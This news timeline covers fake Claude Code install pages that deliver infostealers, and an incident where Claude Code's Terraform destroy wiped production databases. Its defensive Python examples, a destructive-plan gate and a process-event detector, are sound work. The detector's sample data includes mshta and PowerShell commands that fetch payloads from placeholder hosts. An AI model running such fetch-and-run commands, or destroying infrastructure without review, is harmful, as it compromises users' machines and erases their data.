Malicious and unsafe use of Anthropic Claude Code leading to malware delivery and destructive infrastructure changes
Push Security reported an “InstallFix” malvertising campaign targeting developers searching for Anthropic’s Claude Code CLI. Attackers clone the legitimate installation page on lookalike domains and buy Google Search ads so the fake pages rank highly for queries like “install Claude Code” and “Claude Code CLI.” While links on the page route to Anthropic’s real site, the copy‑paste install one‑liners are replaced with malicious commands that fetch malware from attacker-controlled infrastructure; the Windows flow was observed delivering the Amatera Stealer, with macOS users likely targeted by similar info-stealing malware.
Separately, a reported operational incident highlighted the risk of delegating privileged infrastructure actions to AI agents without strong guardrails: a developer described using Claude Code to run Terraform changes during an AWS migration and, after a missing Terraform state file led to duplicate resources, subsequent cleanup actions resulted in the deletion of production components, including a database and recovery snapshots—wiping roughly 2.5 years of records. Together, the reports underscore two distinct but compounding risks around AI coding agents: supply-chain style social engineering via fake install instructions and high-impact misexecution when AI-driven automation is allowed to operate with destructive permissions in production environments.
How this story unfolded
12 events from the earliest known activity through the most recent confirmed update.
Developer's Claude Code/Terraform run destroys two AWS website environments
During a migration of AI Shipping Labs to AWS infrastructure shared with DataTalks.Club, Alexey Grigorev provided the Terraform state late; Claude Code then acted on that state and executed a Terraform destroy. The action wiped both sites' infrastructure, including a database and snapshots containing about 2.5 years of records.
Grigorev publishes post-mortem and hardening changes
In a post-mortem, Grigorev said he would test restores, add deletion protections and tighter permissions, move Terraform state to S3, and require manual review and execution for destructive actions instead of letting the AI agent run them directly.
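One way to enforce the last of those hardening changes, the rule that an agent never runs destructive Terraform actions itself, is to gate the plan before apply. The following is an added example, not code from Grigorev's post-mortem or from any project: it reads the JSON that `terraform show -json tfplan` emits, refuses unattended apply whenever any resource would be deleted or replaced, and lists what a human must review and execute by hand. The sample plan and the PROTECTED_TYPES list are constructed for illustration.

```python
import json

# Constructed sample of `terraform show -json tfplan` output, abridged to the
# fields this gate reads. It mirrors the incident above: the plan would delete
# a database and a snapshot, replace a web instance, and update a bucket.
SAMPLE_PLAN = json.dumps({
    "format_version": "1.2",
    "resource_changes": [
        {"address": "aws_db_instance.main", "type": "aws_db_instance",
         "change": {"actions": ["delete"]}},
        {"address": "aws_db_snapshot.nightly", "type": "aws_db_snapshot",
         "change": {"actions": ["delete"]}},
        {"address": "aws_instance.web", "type": "aws_instance",
         "change": {"actions": ["create", "delete"]}},
        {"address": "aws_s3_bucket.assets", "type": "aws_s3_bucket",
         "change": {"actions": ["update"]}},
    ],
})

# Resource types whose loss was unrecoverable in the incident described above.
# Assumption: this list is illustrative, not a Terraform or AWS built-in.
PROTECTED_TYPES = {"aws_db_instance", "aws_db_snapshot", "aws_ebs_snapshot"}


def destructive_changes(plan_json: str) -> list:
    """Return every resource change that removes a resource.

    Terraform encodes a replacement as both "delete" and "create" in the
    actions list, so any change whose actions contain "delete" is destructive.
    """
    plan = json.loads(plan_json)
    found = []
    for rc in plan.get("resource_changes", []):
        actions = set(rc.get("change", {}).get("actions", []))
        if "delete" in actions:
            found.append({
                "address": rc["address"],
                "replace": "create" in actions,
                "protected": rc.get("type") in PROTECTED_TYPES,
            })
    return found


def agent_may_apply(plan_json: str) -> tuple:
    """Gate an unattended (agent-driven) apply: refuse any destructive plan
    and report what a human must review and run manually instead."""
    changes = destructive_changes(plan_json)
    reasons = [
        f"{c['address']}: {'replace' if c['replace'] else 'delete'}"
        + (" [PROTECTED]" if c["protected"] else "")
        for c in changes
    ]
    return (not changes, reasons)
```

In a pipeline this sits between `terraform plan -out=tfplan` and `terraform apply tfplan`, with the agent allowed to call apply only when the gate returns True.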
Amazon Business Support helps restore deleted AWS data
After the destructive Terraform action, Grigorev contacted Amazon Business Support, which assisted with restoring the lost data. The recovery reportedly took about a day.
Researchers identify fake Claude Code install pages in Google ads
Security researchers reported a malvertising campaign using lookalike Claude Code installation pages and sponsored Google Search results to trick users into copying malicious install commands. The tactic was described as an "InstallFix" attack that weaponizes trusted one-line terminal commands.
Push Security links Windows infection chain to Amatera Stealer
Analysis of the fake Claude Code campaign showed Windows victims were led through a staged execution chain involving cmd.exe and mshta.exe to retrieve attacker-hosted payloads. The resulting malware was identified as Amatera Stealer, an infostealer targeting credentials, cookies, tokens, and system data.
Bitdefender documents Windows and macOS malware from fake Claude Code ads
Bitdefender reported that a fake Claude Code documentation site hosted on a Squarespace subdomain delivered OS-specific malware via ClickFix-style instructions. On Windows it deployed multi-stage stealer payloads, while on macOS it delivered an obfuscated universal Mach-O backdoor capable of remote shell execution.
Google deactivates advertiser account tied to fake Claude Code campaign
Bitdefender said the malicious ad campaign likely used a compromised advertiser account associated with a Malaysian company. Google reportedly deactivated that advertiser account after the abuse was identified.
Expel reveals InstallFix scale and MSIX-based Claude Code variant
Expel reported that InstallFix-style fake software install pages had become widespread, accounting for 13% of malware incidents it observed in March 2026, and identified 46 malicious Anthropic-themed webpages over the prior month. The firm also described a GitLab.io-hosted fake Claude Code page that used mshta to fetch a file named claude.msixbundle containing hidden malicious HTML as an anti-analysis technique.
NordVPN uncovers malware campaign impersonating Google Gemini CLI
NordVPN reported active campaigns using fake websites, cloned repositories, deceptive social posts, and planned typosquatted npm packages to impersonate Google Gemini CLI and trick developers into installing malware. The macOS variant used a Base64-encoded terminal command to download and run a malicious script with elevated privileges, while the Windows variant used a disguised PowerShell fileless attack to provide remote access and enable theft or lateral movement.
Gurucul publishes IOCs and detection guidance for InstallFix Claude Code campaign
Gurucul released additional technical analysis of the fake Claude Code InstallFix campaign, describing PowerShell- and mshta-based fileless execution, AMSI bypass, disabled SSL certificate validation, victim-specific command-and-control URLs, and persistence via scheduled tasks. The report also published indicators of compromise and detection queries covering malicious domains, URLs, IPs, hashes, and filenames tied to the activity.
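The execution chain the reports above describe (a shell-launched mshta.exe or PowerShell pulling a remote payload, including the claude.msixbundle case) is straightforward to flag from process-creation telemetry. The following is an added example, not detection content from Gurucul, Expel or Push Security: it runs two rules over constructed Sysmon-style events. The event records and the example.invalid domains are made up for illustration and are not indicators from any report.

```python
import re
from typing import Optional

# Constructed Sysmon-style process-creation events (not real telemetry).
# Event 2 models the page's cmd.exe -> mshta.exe fetch of claude.msixbundle;
# the domains are placeholders, not indicators from any report.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Tools\setup.hta"},
    {"id": 2, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://update.example.invalid/claude.msixbundle"},
    {"id": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -NoProfile -Command '
                     '"Invoke-RestMethod https://cdn.example.invalid/install.ps1"'},
    {"id": 4, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\backup.ps1"},
]

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
INTERACTIVE_SHELLS = {"cmd.exe", "explorer.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return a rule name if the event matches an InstallFix-style pattern."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    urls = REMOTE_URL.findall(event["command_line"])
    # mshta.exe hosts local HTML Applications; a remote URL argument means it
    # is acting as a downloader, which is the staged chain the reports describe.
    if image == "mshta.exe" and urls:
        return "mshta_remote_url"
    # A PowerShell parented by an interactive shell that fetches a remote
    # script matches the pasted one-liner flow, so surface it for review.
    if image in {"powershell.exe", "pwsh.exe"} and urls and parent in INTERACTIVE_SHELLS:
        return "powershell_remote_fetch"
    return None


def scan(events: list) -> list:
    """Run classify() over a batch and return (event id, rule) hits."""
    return [(e["id"], rule) for e in events if (rule := classify(e))]
```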
Trend Micro links fake Claude installer campaign to RedLine Stealer activity
Trend Micro reported that the InstallFix-style fake Claude AI installer campaign used paid Google ads and OS-specific social engineering to infect Windows and macOS users, and said the infrastructure and behaviors closely aligned with RedLine Stealer activity. The company also noted observed victims in the United States, Malaysia, the Netherlands, and Thailand across government, education, electronics, and food and beverage sectors.
Ontinue details browser-secret theft in fake Claude Code installer campaign
Ontinue reported an ongoing campaign using sponsored search results and lookalike Claude Code install pages to swap a legitimate one-line installer for an attacker-controlled PowerShell command. The payload abuses Chromium's IElevator2 COM interface to recover encryption keys and decrypt browser-stored cookies, passwords, and payment data, while using Cloudflare-fronted domains and rendered HTML to conceal malicious behavior.
Sources
12 references tracked.
Fake Claude Code Installer Targets Developers With Browser Credential Stealer (hackread.com)
Behind a Fake Claude Code Installer (ontinue.com)
Cookie thieves caught stealing dev secrets (theregister.com)
Hackers Using Fake Claude AI Installer Pages to Trick Users Into Running Malware on Their Systems (cybersecuritynews.com)
InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise (community.gurucul.com)
Developers warned to avoid 'early-access' Google Gemini tools (itpro.com)
InstallFix: Not the application you were looking for (expel.com)
Fake Claude Code Spreads Malware to Windows, macOS Users (techrepublic.com)
Windows and macOS Malware Spreads via Fake “Claude Code” Google Ads (bitdefender.com)
Fake Claude Code install pages highlight rise of "InstallFix" attacks (helpnetsecurity.com)
Claude Code deletes developers' production setup, including its database and snapshots - 2.5 years of records were nuked in an instant (tomshardware.com)
InstallFix: Dissecting a Multi-Stage Infostealer Campaign Hiding Behind Fake Claude Code Installers (intel.breakglass.tech)